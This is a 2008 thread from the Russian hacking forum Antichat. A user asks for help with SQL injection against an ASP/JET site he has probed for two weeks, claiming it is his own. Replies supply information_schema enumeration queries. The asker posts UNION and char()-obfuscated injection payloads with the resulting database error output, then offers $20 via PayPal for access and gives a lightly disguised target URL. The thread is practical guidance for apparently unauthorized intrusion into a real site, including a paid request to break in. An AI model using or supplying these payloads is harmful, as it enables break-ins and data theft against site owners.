Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

27.10.2008, 20:30
|
|
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме: 102758
Репутация:
3
|
|
Помогите с MS SQL
Копаю сайт уже две недели. Нашёл несколько работающих инклудов.
Переберал самописным брутом название таблиц словарём в 700+ слов найденым здесь. Ничё не подошло. Знаю только одну таблицу 'Jobs'.
Доступ к сайту запаролен. Админ там давно не был и не хочет давать доступ в адмику так как сервер его, а сайт мой (он для меня делал).
Пишите в личку дам пароль.
|
|
|

27.10.2008, 20:40
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме: 12985021
Репутация:
676
|
|
Переберал самописным брутом название таблиц словарём в 700+ слов найденым здесь.
в mssql все проще 
select top 1 table_name from information_schema.tables
select top 1 column_name from information_schema.columns where table_name='name'
|
|
|

27.10.2008, 20:53
|
|
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме: 102758
Репутация:
3
|
|
не прокатывает, причём работает только когда делаю запросы /viewjob.asp?v=1 union select * from jobs без ' и --
Сообщение от aka PSIH
select top 1 table_name from information_schema.tables
Код:
Microsoft JET Database Engine error '80040e14'
Syntax error. in query expression 'id = 440 select top 1 table_name from information_schema.tables'.
/jobs/editjob.asp, line 7
Сообщение от aka PSIH
select top 1 column_name from information_schema.columns where table_name='name'
Код:
Microsoft JET Database Engine error '80040e14'
Syntax error. in query expression 'id = 440 select top 1 column_name from information_schema.columns where table_name='jobs''.
/jobs/editjob.asp, line 7
P.S. Я здесь все туториалы перекопал.
Последний раз редактировалось strecher; 27.10.2008 в 20:59..
|
|
|

27.10.2008, 21:00
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме: 12985021
Репутация:
676
|
|
|
|
|

27.10.2008, 21:18
|
|
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме: 102758
Репутация:
3
|
|
Первую статью я вчера прочитал.
Вторую уже
Почему select top 1 неработает хотя select union 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26 from jobs работает?
|
|
|

27.10.2008, 21:30
|
|
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме: 102758
Репутация:
3
|
|
этот запрос хорошо проходит
Код:
http://www.site.com/news.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+ (char(117)%2Bchar(115)%2Bchar(101)%2Bchar(114)))--
Microsoft JET Database Engine error '80004005'
Could not find file 'c:\windows\system32\inetsrv\INFORMATION_SCHEMA.md b'.
/jobs/editjob.asp, line 7
как бы мне им воспользоватся?
|
|
|

27.10.2008, 23:35
|
|
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме: 102758
Репутация:
3
|
|
ну у меня есть $20 в paypal'е так что дерзайте, доступ нужен позарез.
z_i_b_i_o.co.uk/jobs/login.ht_m (уберери _)
два85три9867адын - за пассом
|
|
|

28.10.2008, 04:53
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме: 12985021
Репутация:
676
|
|
|
|
|

28.10.2008, 13:51
|
|
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме: 102758
Репутация:
3
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|